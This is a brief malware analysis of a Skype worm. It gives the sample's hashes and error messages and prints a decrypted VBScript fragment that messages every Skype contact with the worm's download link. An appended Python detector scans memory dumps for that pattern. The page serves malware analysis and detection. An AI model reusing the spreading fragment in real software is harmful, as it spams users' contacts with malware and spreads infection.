Skype Worm | Joachim De Zutter
File contains:

Filename: slideshow-snimki.exe
Filesize: 185856
MD5: 998c035292b34fe07200202adfa56efe
SHA1: f86b2a68d7808b98f9795dd93302807b2e43e558
SHA256: d7527fdde8c7d2a4c41b5225844920b5f88e8900dea4fb2e6d3fafdc210ceb0b

The application starts with a message box saying:

"This application created with Unregistered version of ScriptCryptor.
Please register your copy to remove this window.
Visit for more info."

The malware opens the registry keys associated with the Skype4COM API:


If the keys couldn't be found, an error message is displayed:

"Error: Invalid class string
Line: 1
Position: 1"

After installing the Skype client without setting up a user account, another error message is displayed:

"Error: Not attached.
Line: 3
Position: 1"

Part of the decrypted script looks as follows in memory:

set yADAl = Wscript.CreateObject("Skype4COM.Skype", "Skype_")
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle, <msg>

where <msg> contains a URL that points to the download location of the worm.

The worm doesn't appear to do more than spread itself and its message.
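
A triage check built on the decrypted fragment above, as an added example that is not part of the original analysis: it pulls ASCII and UTF-16LE strings out of a memory dump and flags the combination of the Skype4COM object, a loop over Friends and a SendMessage to each contact handle. The function names, the filler bytes around the fragment and the benign script are constructed for illustration.

```python
import re

# Structural markers from the decrypted fragment; variable names are ignored
# because nothing guarantees they stay the same between samples (assumption).
MARKERS = {
    "skype4com_object": re.compile(r'CreateObject\s*\(\s*"Skype4COM\.Skype"', re.I),
    "friends_loop": re.compile(r'For\s+Each\s+\w+\s+In\s+\w+\.Friends\b', re.I),
    "send_to_handle": re.compile(r'\.SendMessage\s+\w+\.handle\b', re.I),
}

def extract_strings(data, min_len=6):
    """Yield (offset, text) for printable runs stored as ASCII or UTF-16LE."""
    printable = rb'[\x20-\x7e\t\r\n]'
    for m in re.finditer(printable + rb'{%d,}' % min_len, data):
        yield m.start(), m.group().decode("ascii")
    for m in re.finditer(rb'(?:' + printable + rb'\x00){%d,}' % min_len, data):
        yield m.start(), m.group().decode("utf-16-le")

def scan(data):
    """Return {marker_name: offset of the first string that contained it}."""
    hits = {}
    for offset, text in extract_strings(data):
        for name, rx in MARKERS.items():
            if name not in hits and rx.search(text):
                hits[name] = offset
    return hits

def is_skype_spreader(data):
    """All three markers together describe the message-every-contact behaviour."""
    return set(scan(data)) == set(MARKERS)

# Constructed sample: the page's fragment as UTF-16LE inside filler bytes.
FRAGMENT = ('set yADAl = Wscript.CreateObject("Skype4COM.Skype", "Skype_")\r\n'
            'For Each GAG In yADAl.Friends\r\n'
            'yADAl.SendMessage GAG.handle, <msg>\r\n')
SAMPLE_DUMP = b"\xff" * 64 + FRAGMENT.encode("utf-16-le") + b"\xff" * 64
# Constructed benign script: creates the object but never messages contacts.
BENIGN = b'Set s = WScript.CreateObject("Skype4COM.Skype")\r\nWScript.Echo "ok"\r\n'

if __name__ == "__main__":
    print(scan(SAMPLE_DUMP), is_skype_spreader(SAMPLE_DUMP), is_skype_spreader(BENIGN))
```

Requiring all three markers keeps a script that merely instantiates Skype4COM from being flagged.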